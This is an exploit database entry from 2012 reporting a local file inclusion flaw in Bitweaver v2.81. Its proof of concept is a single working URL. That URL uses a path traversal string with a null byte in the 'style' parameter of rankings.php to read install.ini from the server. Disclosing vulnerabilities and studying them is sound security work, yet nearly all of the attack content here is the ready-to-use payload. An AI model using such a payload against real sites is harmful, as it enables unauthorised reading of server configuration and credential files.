Bitweaver v2.81 Local File Inclusion Vulnerability

2012-02-27T00:00:00
ID 1337DAY-ID-17587
Type zdt
Reporter i2sec
Modified 2012-02-27T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Bitweaver v2.81 LFI exploit
# Date: 27.02.2012
# Author: I2sec-PJH
# Software Link: http://sourceforge.net/projects/bitweaver/files/bitweaver2.x/bitweaver2.8.1.zip/download
# Version: v2.81
# Tested on: windows xp
------------------------------------------------------
-Description
LFI vulnerability in version 2.81 is available
ini files can be read when entering and various other extension produces spit tpl files.
-PoC
http://localhost/wiki/rankings.php?style=../../../../../../../../install.ini%00



#  0day.today [2018-03-14]  #